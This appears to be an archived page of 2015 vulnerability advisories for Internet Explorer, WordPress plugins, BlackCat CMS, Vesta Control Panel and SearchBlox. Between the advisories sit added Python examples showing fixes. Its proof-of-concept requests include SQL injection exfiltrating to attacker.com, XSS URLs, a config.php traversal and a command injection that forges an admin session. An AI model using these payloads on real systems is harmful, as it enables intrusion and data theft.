associated risk levels, Onapsis Research Labs combine in-depth knowledge
and experience to deliver technical and business-context with sound
security judgment to the broader information security community.
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Onapsis Research Team

iEYEARECAAYFAlXLXXEACgkQz3i6WNVBcDXHzgCdFcY7MtChSCFGXIZHI5E2BZFA
NbQAoLxIogVIwsqLsp9OsXjdlKzOvOpM
=C9yq
-END PGP SIGNATURE-
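The three DataVault advisories above describe two separate defects: keys and salts derived from fixed values and the vault identifier (advisories 2015-011 and 2015-012), so they can be recomputed from the container itself, and encryption without any integrity mechanism (advisory 2015-010), so a recovered keystream lets stored values be altered. The Python block below is an added example written for this page; it is not SAP code and not the DataVault API. It shows the two properties a passcode-protected store needs instead: a per-vault random salt fed to PBKDF2, and an encrypt-then-MAC container whose tag is checked before anything is decrypted. To stay on the standard library, the keystream comes from HMAC-SHA256 in counter mode rather than AES; the salt and integrity logic does not depend on that substitution. All names, constants and sample values are constructed.

```python
import hashlib
import hmac
import os
import struct

# Constructed parameters for the example; a production store would tune the
# iteration count for the device and version the container layout.
PBKDF2_ITERATIONS = 100_000
SALT_LEN = 16
NONCE_LEN = 16
TAG_LEN = 32


def derive_key(passcode: str, salt: bytes) -> bytes:
    """Derive a 256-bit master key from the passcode and a per-vault random salt.
    Because the salt comes from os.urandom rather than from fixed values or the
    vault id, two vaults protected by the same passcode get different keys, and
    nothing stored in the container lets the key be recomputed without the
    passcode."""
    return hashlib.pbkdf2_hmac("sha256", passcode.encode(), salt,
                               PBKDF2_ITERATIONS, dklen=32)


def _subkeys(master: bytes):
    """Split independent encryption and authentication keys from the master key."""
    return (hmac.new(master, b"enc", hashlib.sha256).digest(),
            hmac.new(master, b"mac", hashlib.sha256).digest())


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256, standing in for AES-CTR so the
    example runs on the standard library. Like any stream cipher, XORing it into
    the data gives confidentiality only: a flipped ciphertext bit flips the same
    plaintext bit, which is why the tag below is mandatory."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(passcode: str, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC. Layout: salt || nonce || ciphertext || tag.
    A fresh nonce per value means the keystream is never reused across entries."""
    salt, nonce = os.urandom(SALT_LEN), os.urandom(NONCE_LEN)
    enc_key, mac_key = _subkeys(derive_key(passcode, salt))
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    return salt + nonce + ct + tag


def open_sealed(passcode: str, blob: bytes) -> bytes:
    """Verify the tag in constant time before touching the ciphertext and refuse
    any modified container; a wrong passcode also fails here, since it yields a
    different MAC key."""
    if len(blob) < SALT_LEN + NONCE_LEN + TAG_LEN:
        raise ValueError("container too short")
    salt = blob[:SALT_LEN]
    nonce = blob[SALT_LEN:SALT_LEN + NONCE_LEN]
    ct, tag = blob[SALT_LEN + NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    enc_key, mac_key = _subkeys(derive_key(passcode, salt))
    expected = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("integrity check failed: container modified or wrong passcode")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))


def tamper_is_detected(passcode: str, plaintext: bytes) -> bool:
    """Flip one ciphertext bit and confirm the store refuses to open the result."""
    blob = bytearray(seal(passcode, plaintext))
    blob[SALT_LEN + NONCE_LEN] ^= 0x01
    try:
        open_sealed(passcode, bytes(blob))
    except ValueError:
        return True
    return False


def wrong_passcode_is_rejected(passcode: str, plaintext: bytes) -> bool:
    """A container sealed under one passcode must not open under another."""
    try:
        open_sealed(passcode + "x", seal(passcode, plaintext))
    except ValueError:
        return True
    return False
```

The tag covers the salt and nonce as well as the ciphertext, so swapping the header of one container onto the body of another is also rejected; and because nothing in the container is derived from a fixed value or from the vault id, an attacker holding the container still has to recover the passcode itself.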



BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability

2015-08-12 Thread Blue Frost Security Research Lab
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/   research(at)bluefrostsecurity.de
BFS-SA-2015-001   12-August-2015


Vendor: Microsoft, http://www.microsoft.com
Affected Products:  Internet Explorer
Affected Version:   IE 8-11
Vulnerability:  CTreeNode::GetCascadedLang Use-After-Free Vulnerability
CVE ID: CVE-2015-2444


I.   Impact

If an attacker succeeds in bypassing the Memory Protector and Isolated Heap
protection mechanisms this vulnerability allows the execution of arbitrary
code on vulnerable installations of Microsoft Internet Explorer. User
interaction is required to exploit this vulnerability in that the target must
visit a malicious page or open a malicious file.



II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::GetCascadedLang function. The following analysis was
performed on Internet Explorer 11 on Windows 8.1 (x64).

The following HTML page demonstrates the problem:

!DOCTYPE HTML
html
meta http-equiv=X-UA-Compatible content=IE=10 /
script
function Trigger() {
for(i=0; i  document.getElementsByTagName(meter).length; 
i++) {
document.getElementsByTagName(meter)[i].innerText = 
a;
}
}
function reload() {
location.reload();
}
setTimeout(reload(), 1000);
/script
buttonlabelstylelabel{}/styleform
meterlabeloptgroupmeterfieldsetscriptTrigger();/script/meter
select/selectbutton/buttonformform
inputscriptTrigger();/script
formstyleform{-ms-behavior: url(c);}/style/form
/html

With page heap enabled, visiting that page results in the following crash:

(7c0.408): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
C:\Windows\SYSTEM32\MSHTML.dll - 
eax= ebx=12698fa0 ecx= edx=0100 esi= edi=12696fb8
eip=6fea5a44 esp=0a75ba18 ebp=0a75ba38 iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
MSHTML!CreateCoreWebView+0x1e0234:
6fea5a44 81b82803506ffb6f cmp dword ptr [eax+328h],offset 
MSHTML!CreateCoreWebView+0x2f1740 (6ffb6f50) ds:002b:0328=

0:005 ub
MSHTML!CTreeNode::GetCascadedLang+0x5f:
6fea5a2b 8945f8  mov dword ptr [ebp-8],eax
6fea5a2e 8945f0  mov dword ptr [ebp-10h],eax
6fea5a31 8b4710  mov eax,dword ptr [edi+10h]
6fea5a34 85c0testeax,eax
6fea5a36 740aje  MSHTML!CTreeNode::GetCascadedLang+0x76 
(6fea5a42)
6fea5a38 f6400c04testbyte ptr [eax+0Ch],4
6fea5a3c 0f859a02jne MSHTML!CTreeNode::GetCascadedLang+0x30f 
(6fea5cdc)
6fea5a42 8b07mov eax,dword ptr [edi]

0:005 !heap -p -a edi+10
address 12696fc8 found in
_DPH_HEAP_ROOT @ a961000
in busy allocation (  DPH_HEAP_BLOCK: UserAddr UserSize -   
  VirtAddr VirtSize)
 a9646e8: 12696fb8   48 -   
  12696000 2000
71e694ec verifier!AVrfDebugPageHeapAllocate+0x023c
779057b7 ntdll!RtlDebugAllocateHeap+0x003c
778a77ce ntdll!RtlpAllocateHeap+0x0004665a
77861134 ntdll!RtlAllocateHeap+0x014d
6fa31dd5 MSHTML!CLabelElement::CreateElement+0x0015
6f8a5b4d MSHTML!CreateElement+0x0084
6fa14768 MSHTML!CInBodyInsertionMode::DefaultStartElementHandler+0x0078
6f91d6eb MSHTML!CInsertionMode::HandleStartElementToken+0x003d
6f91d3a3 
MSHTML!CHtml5TreeConstructor::HandleElementTokenInInsertionMode+0x0026
6f91d338 MSHTML!CHtml5TreeConstructor::PushElementToken+0x00a5
6f91d1cc MSHTML!CHtml5Tokenizer::TagName_StateHandler+0x028c
6f91ab35 MSHTML!CHtml5Tokenizer::ParseBuffer+0x012c
6f91ae09 MSHTML!CHtml5Parse::ParseToken+0x0131
6f91a377 MSHTML!CHtmPost::ProcessTokens+0x06af
6f914952 MSHTML!CHtmPost::Exec+0x01e4
6f991118 MSHTML!CHtmPost::Run+0x003d
6f99107e MSHTML!PostManExecute+0x0061
6f9994a2 MSHTML!PostManResume+0x007b
6f9b04f7 MSHTML!CDwnChan::OnMethodCall+0x003e
6f7fd865 MSHTML!GlobalWndOnMethodCall+0x016d
6f7fd18a MSHTML!GlobalWndProc+0x02e5
75a68e71 user32!_InternalCallWinProc+0x002b
75a690d1 user32!UserCallWinProcCheckWow+0x018e
75a6a66f user32!DispatchMessageWorker+0x0208
75a6a6e0 user32!DispatchMessageW+0x0010
710600d8 IEFRAME!CTabWindow

SQL Injection in Count Per Day WordPress Plugin

2015-07-22 Thread High-Tech Bridge Security Research
Advisory ID: HTB23267
Product: Count Per Day WordPress plugin
Vendor: Tom Braider 
Vulnerable Version(s): 3.4 and probably prior
Tested Version: 3.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: July 1, 2015 
Public Disclosure: July 22, 2015 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2015-5533
Risk Level: Medium 
CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered an SQL Injection vulnerability 
in the Count Per Day WordPress plugin, which can be exploited to execute arbitrary 
SQL queries in the application's database, gain control of potentially sensitive 
information and compromise the entire website. 

The vulnerability is caused by insufficient filtering of input data passed via 
the cpd_keep_month HTTP POST parameter to the /wp-admin/options-general.php 
script. A remote user with administrative privileges can manipulate SQL 
queries and inject and execute arbitrary SQL commands within the application's 
database. 
This vulnerability can also be exploited by an anonymous attacker via a CSRF 
vector, since the web application does not check the origin of HTTP requests.

The PoC code below is based on the DNS exfiltration technique and may be used if 
the database of the vulnerable application is hosted on a Windows system. The 
PoC will send a DNS request asking for the IP address of the `version()` (or any 
other sensitive output from the database) subdomain of .attacker.com (a domain 
name whose DNS server is controlled by the attacker):


form action = 
http://wordpress/wp-admin/options-general.php?page=count-per-day/counter-options.phptab=tools;
 method = POST name=f1
input type=hidden name=collect value=Collect old data
input type=hidden name=do value=cpd_collect
input type=hidden name=cpd_keep_month value=6 MONTH) AND 1=(select 
load_file(CONCAT(CHAR(92),CHAR(92),(select 
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114
 -- 2
input value=go type=submit /
/formscriptdocument.f1.submit();/script


---

Solution:

Update to Count Per Day 3.4.1

More Information:
https://wordpress.org/plugins/count-per-day/changelog/
https://plugins.trac.wordpress.org/changeset/1190683/count-per-day

---

References:

[1] High-Tech Bridge Advisory HTB23267 - 
https://www.htbridge.com/advisory/HTB23267 - SQL Injection in Count Per Day 
WordPress Plugin.
[2] Count Per Day WordPress plugin - 
https://wordpress.org/plugins/count-per-day/ - A statistics plugin which 
displays Visit Counter, shows reads and visitors per page, visitors today, 
yesterday, last week, last months and other statistics.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
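The advisory above names two conditions that together make the bug reachable by an anonymous attacker: the cpd_keep_month value is spliced into a SQL statement, and the options handler does not check where the request came from. The Python block below is an added example written for this page, not the plugin's PHP code; it models the same handler with the three controls that close both conditions: a strict integer parse of the parameter, a constant SQL statement with the cutoff bound as a parameter, and a per-session nonce that a cross-site auto-submitted form cannot supply. The nonce scheme is a constructed HMAC token (only the field name `_wpnonce` follows the WordPress convention), and the visits table and dates are constructed sample data.

```python
import hashlib
import hmac
import sqlite3
from datetime import date

# Constructed sample data: one row per recorded visit, as a statistics
# plugin might keep them.
SAMPLE_VISITS = [("2014-11-03",), ("2015-01-15",), ("2015-06-30",), ("2015-07-20",)]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE visits (day TEXT NOT NULL)")
    con.executemany("INSERT INTO visits VALUES (?)", SAMPLE_VISITS)
    con.commit()
    return con


def parse_keep_months(raw: str) -> int:
    """Accept only a small positive integer. A value shaped like the advisory's
    payload ('6 MONTH) AND 1=(select ...') fails here, before any SQL exists."""
    if not raw.isdigit():
        raise ValueError("cpd_keep_month must be a decimal integer")
    months = int(raw)
    if not 1 <= months <= 120:
        raise ValueError("cpd_keep_month out of range")
    return months


def months_before(today: date, months: int) -> date:
    """Calendar arithmetic done in Python, so the cutoff reaches SQL as one bound value."""
    year, month = today.year, today.month - months
    while month <= 0:
        year, month = year - 1, month + 12
    return date(year, month, min(today.day, 28))


def collect_old_data(con: sqlite3.Connection, keep_months: int, today: date) -> int:
    """Delete visits older than the cutoff. The SQL text is a constant; the only
    variable part is bound through a placeholder and can never alter the query."""
    cutoff = months_before(today, keep_months).isoformat()
    cur = con.execute("DELETE FROM visits WHERE day < ?", (cutoff,))
    con.commit()
    return cur.rowcount


def make_nonce(secret: bytes, session_id: str, action: str) -> str:
    """Per-session, per-action token (constructed scheme). A page on another
    origin cannot read it, so a cross-site form cannot present it."""
    return hmac.new(secret, f"{session_id}:{action}".encode(), hashlib.sha256).hexdigest()


def verify_nonce(secret: bytes, session_id: str, action: str, presented: str) -> bool:
    return hmac.compare_digest(make_nonce(secret, session_id, action), presented)


def handle_collect_request(con: sqlite3.Connection, form: dict, session_id: str,
                           secret: bytes, today: date) -> str:
    """The admin-page handler: prove the request came from our own page first,
    then validate the parameter, then run the parameterised statement."""
    if not verify_nonce(secret, session_id, "cpd_collect", form.get("_wpnonce", "")):
        return "forbidden: missing or invalid nonce"
    try:
        months = parse_keep_months(form.get("cpd_keep_month", ""))
    except ValueError as exc:
        return f"bad request: {exc}"
    return f"ok: deleted {collect_old_data(con, months, today)} rows"
```

Order matters in the handler: the origin check runs before any parameter is looked at, so a forged request is refused even when its parameters are well-formed, and the integer parse runs before the query is built, so the SQL never sees the raw string at all.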



Multiple XSS Vulnerabilities in Paid Memberships Pro WordPress Plugin

2015-07-22 Thread High-Tech Bridge Security Research
Advisory ID: HTB23264
Product: Paid Memberships Pro WordPress plugin
Vendor: Stranger Studios 
Vulnerable Version(s): 1.8.4.2 and probably prior
Tested Version: 1.8.4.2
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: July 8, 2015 
Public Disclosure: July 22, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-5532
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in the Paid 
Memberships Pro WordPress plugin, which can be exploited to perform Cross-Site 
Scripting (XSS) attacks against website administrators.


1) Cross-Site Scripting (XSS) in Paid Memberships Pro WordPress plugin: 
CVE-2015-5532

1.1 Input passed via the s HTTP GET parameter to /wp-admin/admin.php (when 
page is set to pmpro-membershiplevels) is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in 
administrator into opening a specially crafted link and executing arbitrary HTML 
and script code in the browser in the context of the vulnerable website.

The exploitation example below uses the alert() JavaScript function to 
display the word ImmuniWeb:

http://[host]/wp-admin/admin.php?page=pmpro-membershiplevelss=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.2 Input passed via the edit HTTP GET parameter to /wp-admin/admin.php (when 
page is set to pmpro-membershiplevels) is not properly sanitised before 
being returned to the user. A remote attacker can trick a logged-in 
administrator into opening a specially crafted link and executing arbitrary HTML 
and script code in the browser in the context of the vulnerable website.

The exploitation example below uses the alert() JavaScript function to 
display the word ImmuniWeb:

http://[host]/wp-admin/admin.php?page=pmpro-membershiplevelsedit=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.3 Input passed via the s HTTP GET parameter to /wp-admin/admin.php (when 
page is set to pmpro-memberslist) is not properly sanitised before being 
returned to the user. A remote attacker can trick a logged-in administrator into 
opening a specially crafted link and executing arbitrary HTML and script code in 
the browser in the context of the vulnerable website.

The exploitation example below uses the alert() JavaScript function to 
display the word ImmuniWeb:

http://[host]/wp-admin/admin.php?lpage=pmpro-memberslists=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E

1.4 Input passed via the s HTTP GET parameter to /wp-admin/admin.php (when 
page is set to pmpro-orders) is not properly sanitised before being 
returned to the user. A remote attacker can trick a logged-in administrator into 
opening a specially crafted link and executing arbitrary HTML and script code in 
the browser in the context of the vulnerable website.

The exploitation example below uses the alert() JavaScript function to 
display the word ImmuniWeb:

http://[host]/wp-admin/admin.php?filter=allstart-month=1start-day=1start-year=2015end-month=6end-day=22end-year=2015predefined-date=This+Monthl=1statuspage=pmpro-orderss=%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

---

Solution:

Update to Paid Memberships Pro 1.8.4.3

More Information:
http://www.paidmembershipspro.com/2015/07/pmpro-updates-1-8-4-3-and-1-8-4-4/
https://github.com/strangerstudios/paid-memberships-pro/commit/add03e3ed90e9163e5a46e20e6c371a87ff5a677

---

References:

[1] High-Tech Bridge Advisory HTB23264 - 
https://www.htbridge.com/advisory/HTB23264 - Multiple XSS Vulnerabilities in 
Paid Memberships Pro WordPress Plugin.
[2] Paid Memberships Pro WordPress plugin - http://www.strangerstudios.com/ - 
Paid Memberships Pro is the community solution for adding paid memberships to 
your WordPress site.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any

Path Traversal in BlackCat CMS

2015-07-01 Thread High-Tech Bridge Security Research
Advisory ID: HTB23263
Product: BlackCat CMS
Vendor: Black Cat Development
Vulnerable Version(s): 1.1.1 and probably prior
Tested Version: 1.1.1
Advisory Publication:  June 10, 2015  [without technical details]
Vendor Notification: June 10, 2015 
Vendor Patch: June 24, 2015 
Public Disclosure: July 1, 2015 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-5079
Risk Level: High 
CVSSv2 Base Score: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in BlackCat 
CMS, which can be exploited to view the contents of arbitrary files on the local 
system. An attacker might be able to obtain potentially sensitive or system 
information, and even compromise the vulnerable system.

The vulnerability exists due to improper validation of the file path in the dl 
HTTP GET parameter when reading local files using the 
/modules/blackcat/widgets/logs.php script. A remote unauthenticated attacker 
can download arbitrary files from the vulnerable system using directory 
traversal sequences (../).

The simple exploit below downloads the config.php file:

http://host/modules/blackcat/widgets/logs.php?dl=/../config.php



---

Solution:

Update to BlackCat CMS 1.1.2

---

References:

[1] High-Tech Bridge Advisory HTB23263 - 
https://www.htbridge.com/advisory/HTB23263 - Path Traversal in BlackCat CMS.
[2] BlackCat CMS - http://blackcat-cms.org/ - OpenSource Content Management 
System.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
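The advisory's request shape, `dl=/../config.php`, works because the script joins the parameter onto its log directory without checking where the resulting path ends up. The Python block below is an added example written for this page, not BlackCat code; it shows the containment check a file-download endpoint needs: canonicalise the candidate path with realpath (which resolves `..` and symlinks) and then require that it still lies inside the base directory, comparing with commonpath rather than a string prefix. The directory layout, file names and request list are constructed.

```python
import os
import tempfile


def resolve_download(base_dir: str, requested: str) -> str:
    """Map a user-supplied file name onto a path inside base_dir, or raise.
    realpath() resolves '..' sequences and symlinks before the containment
    check, and commonpath() rather than a string-prefix test keeps a sibling
    directory with a shared prefix (logs vs logs2) from passing."""
    base = os.path.realpath(base_dir)
    # A leading slash would otherwise make os.path.join discard base_dir.
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/\\")))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError(f"refusing path outside the log directory: {requested!r}")
    if not os.path.isfile(candidate):
        raise FileNotFoundError(requested)
    return candidate


def demo() -> dict:
    """Constructed tree: a logs/ directory that may be served and a config.php
    beside it that must not be. Returns what each request resolved to."""
    root = tempfile.mkdtemp(prefix="traversal-demo-")
    logs = os.path.join(root, "logs")
    os.mkdir(logs)
    with open(os.path.join(logs, "app.log"), "w") as f:
        f.write("constructed log line\n")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php // constructed secrets\n")
    outcomes = {}
    requests = ("app.log", "/../config.php", "../config.php", "sub/../app.log", "missing.log")
    for request in requests:
        try:
            outcomes[request] = os.path.basename(resolve_download(logs, request))
        except (PermissionError, FileNotFoundError) as exc:
            outcomes[request] = type(exc).__name__
    return outcomes
```

Note that `sub/../app.log` is accepted: after canonicalisation it is simply `app.log` inside the base directory, so the check is about where a path ends up, not about whether the string contains `..`. Filtering the substring instead would reject that harmless request while still missing encoded or symlinked variants.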



OS Command Injection in Vesta Control Panel

2015-06-17 Thread High-Tech Bridge Security Research
Advisory ID: HTB23261
Product: Vesta Control Panel
Vendor: http://vestacp.com
Vulnerable Version(s): 0.9.8 and probably prior
Tested Version: 0.9.8
Advisory Publication:  May 20, 2015  [without technical details]
Vendor Notification: May 20, 2015 
Vendor Patch: June 3, 2015 
Public Disclosure: June 17, 2015 
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2015-4117
Risk Level: Critical 
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical vulnerability in 
Vesta Control Panel, which can be exploited to execute arbitrary system 
commands and gain complete access to the vulnerable system.

The vulnerability exists due to insufficient filtering of user input passed 
via the backup HTTP GET parameter to /list/backup/index.php before it is used 
in the PHP 'exec()' function. A remote authenticated attacker can inject 
arbitrary commands and execute them on the system with the privileges of the 
default Vesta Control Panel admin account. 

Successful exploitation of this vulnerability may allow an attacker to gain 
complete control over the Vesta Control Panel and use it to advance his 
privileges on the system, manage installed services, reconfigure the firewall, 
etc. Since Vesta Control Panel is a multi-user control panel for hosting 
multiple websites, any registered client can use the described vulnerability 
to compromise the entire system.

The simple exploit below will create a PHP session file in the /tmp/ directory 
with administrative access to Vesta Control Panel:

https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20  echo 
'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'
 | base64 --decode  /tmp/sess_12345%20||%20echo%20\
  
After successful creation of PHP session file, the following cookie can be used 
to gain administrative access:
 
 
GET / HTTP/1.1
Cookie: 
mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D;
 PHPSESSID=12345



---

Solution:

Update to Vesta Control Panel 0.9.8-14

More Information:
http://vestacp.com/roadmap/#history

---

References:

[1] High-Tech Bridge Advisory HTB23261 - 
https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta 
Control Panel.
[2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control 
panel with premium features, secure, advanced and minimalistic design
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided as is and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.
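The root cause named above is a request parameter reaching `exec()` inside a shell command line, where quote and pipe characters end the intended command and start another. The Python block below is an added example written for this page, not Vesta code; it contrasts the vulnerable shape (a command string built by concatenation, shown only as a string and never executed) with the hardened one: an allowlist on the backup name, and the child process started with an argv list and no shell, so the name is delivered as one literal argument. The backup archive, its contents and the listing tool are constructed stand-ins.

```python
import os
import re
import subprocess
import sys
import tarfile
import tempfile

# Allowlist for a backup archive name: letters, digits, dot, underscore, dash.
# No quotes, spaces, pipes or path separators, so the advisory's
# "123' || ... || echo" shape is rejected before any process starts.
BACKUP_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")

# Constructed child program standing in for the backup-listing tool: prints the
# member names of the archive given as its single argument.
LIST_TOOL = "import sys, tarfile; print('\\n'.join(tarfile.open(sys.argv[1]).getnames()))"


def validate_backup_name(raw: str) -> str:
    if not BACKUP_NAME.fullmatch(raw):
        raise ValueError(f"invalid backup name: {raw!r}")
    return raw


def is_rejected(raw_name: str) -> bool:
    try:
        validate_backup_name(raw_name)
    except ValueError:
        return True
    return False


def unsafe_command_line(raw: str) -> str:
    """The vulnerable shape, returned as text for contrast and never executed:
    the parameter is pasted into a string a shell will parse, so a quote closes
    the argument and what follows runs as further commands."""
    return f"list-backup '{raw}'"


def list_backup(backup_dir: str, raw_name: str) -> list:
    """Hardened form: validate against the allowlist, then pass the path as one
    argv element with shell=False, so no shell ever sees it."""
    path = os.path.join(backup_dir, validate_backup_name(raw_name))
    proc = subprocess.run([sys.executable, "-c", LIST_TOOL, path],
                          capture_output=True, text=True, check=True)
    return proc.stdout.split()


def make_sample_backup() -> str:
    """Constructed backup directory holding one small archive."""
    d = tempfile.mkdtemp(prefix="backup-demo-")
    with tarfile.open(os.path.join(d, "site-2015-06-03.tar"), "w") as tar:
        for name in ("www/index.html", "db/site.sql"):
            p = os.path.join(d, "stage", name)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "w") as f:
                f.write("constructed\n")
            tar.add(p, arcname=name)
    return d
```

The allowlist and the argv list are independent defences: the argv form alone already stops the shell from interpreting the value, and the allowlist additionally keeps path separators out so the listing tool cannot be pointed at a file outside the backup directory.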



Reflected Cross-Site Scripting (XSS) in SearchBlox

2015-06-17 Thread High-Tech Bridge Security Research
Advisory ID: HTB23256
Product: SearchBlox
Vendor: SearchBlox Software, Inc.
Vulnerable Version(s): 8.2 and probably prior
Tested Version: 8.2
Advisory Publication:  April 22, 2015  [without technical details]
Vendor Notification: April 22, 2015 
Vendor Patch: May 26, 2015 
Public Disclosure: June 17, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3422
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered an XSS vulnerability in 
SearchBlox, which can be exploited to perform Cross-Site Scripting attacks 
against the vulnerable web application's administrators.

Input passed via the menu2 HTTP GET parameter to the /searchblox/admin/main.jsp 
script is not properly sanitised before being returned to the user. A remote 
attacker can trick a logged-in administrator into opening a specially crafted 
link and executing arbitrary HTML and scripting code in his browser in the 
context of the vulnerable website.

The simple XSS exploit below uses the alert() JS function to display a box with 
the word ImmuniWeb:

http://[host]/searchblox/admin/main.jsp?menu1=admmenu2=%22%3E%3Cscript%3Ealert%28%27ImmuniWeb%27%29;%3C/script%3E


---

Solution:

Update to SearchBlox 8.2.1

---

References:

[1] High-Tech Bridge Advisory HTB23256 - 
